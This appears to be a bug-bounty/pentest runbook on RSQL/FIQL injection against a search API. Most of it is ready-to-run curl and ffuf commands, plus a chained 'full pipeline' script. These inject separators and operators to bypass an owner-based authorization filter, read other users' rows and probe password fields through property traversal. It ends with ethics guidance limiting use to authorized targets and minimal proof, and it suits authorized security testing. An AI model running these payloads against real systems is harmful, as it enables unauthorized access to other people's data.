Webupdated Oct 1, 2026

RSQL Injection

Injecting into RSQL/FIQL query strings to bypass filters, alter comparisons, and read data the search endpoint should hide.

toolbox:curlffufburp suite

An RSQL injection runbook for bug bounty / authorized pentest on in-scope targets only. Goal: find a search/filter endpoint that parses RSQL/FIQL, then inject separators and operators to escalate privileges or read rows the filter should hide.

1. Find the filter parameter

for p in search filter q query; do
  curl -s -o /dev/null -w "$p -> %{http_code}\n" \
    "https://target.com/api/items?$p=id==1"
done
curl -s "https://target.com/api/users?search=name==alice" | jq .

2. Establish a baseline scope

curl -s "https://target.com/api/users?search=owner==me" | jq '. | length'

3. Logic and separator injection

curl -s "https://target.com/api/users?search=role==user,role==admin" | jq '. | length'
curl -s "https://target.com/api/users?search=id==1;1==1"
curl -s "https://target.com/api/users?search=name==x;(role==admin)"

If a fixed owner filter is concatenated without grouping, your , can override it.

4. Operator abuse and property traversal

curl -s "https://target.com/api/users?search=id=gt=0"
curl -s "https://target.com/api/users?search=id=in=(1,2,3,4,5)"
curl -s "https://target.com/api/users?search=owner.name==admin"
curl -s "https://target.com/api/users?search=owner.password=gt="

Also test =le=, =ge=, =out=, !=, and =like=* where supported.

5. Override the authorization filter

curl -s "https://target.com/api/users?search=owner==me;owner==victim"
curl -s "https://target.com/api/users?search=owner==me,(owner==victim)"
curl -s "https://target.com/api/users?search=owner==me%29"

Automate operator/separator variants:

ffuf -u "https://target.com/api/users?search=FUZZ" -w rsql.txt -mc all -fs 0

6. Confirm with proof only

  • Compare result counts with and without the injected clause.
  • Extract a single proof field, never bulk data.
  • Stop when the widened set or error proves the issue.

Full pipeline

B="https://target.com/api/users"
for p in search filter q query; do
  curl -s -o /dev/null -w "$p -> %{http_code}\n" "$B?$p=id==1"
done
curl -s "$B?search=owner==me" | jq '. | length'
curl -s "$B?search=role==user,role==admin" | jq '. | length'
curl -s "$B?search=id==1;1==1"
curl -s "$B?search=id=gt=0"
curl -s "$B?search=owner.name==admin"
curl -s "$B?search=owner==me;owner==victim"
curl -s "$B?search=owner==me,owner==victim" | jq '.[0].name'

Ethics & legality

  • Only query endpoints and data you are authorized to access.
  • Retrieve the minimum proof — one row or field — never bulk data dumps.
  • Do not use errors to enumerate sensitive schema beyond what is needed.
  • Stop fuzzing once the filter bypass is demonstrated.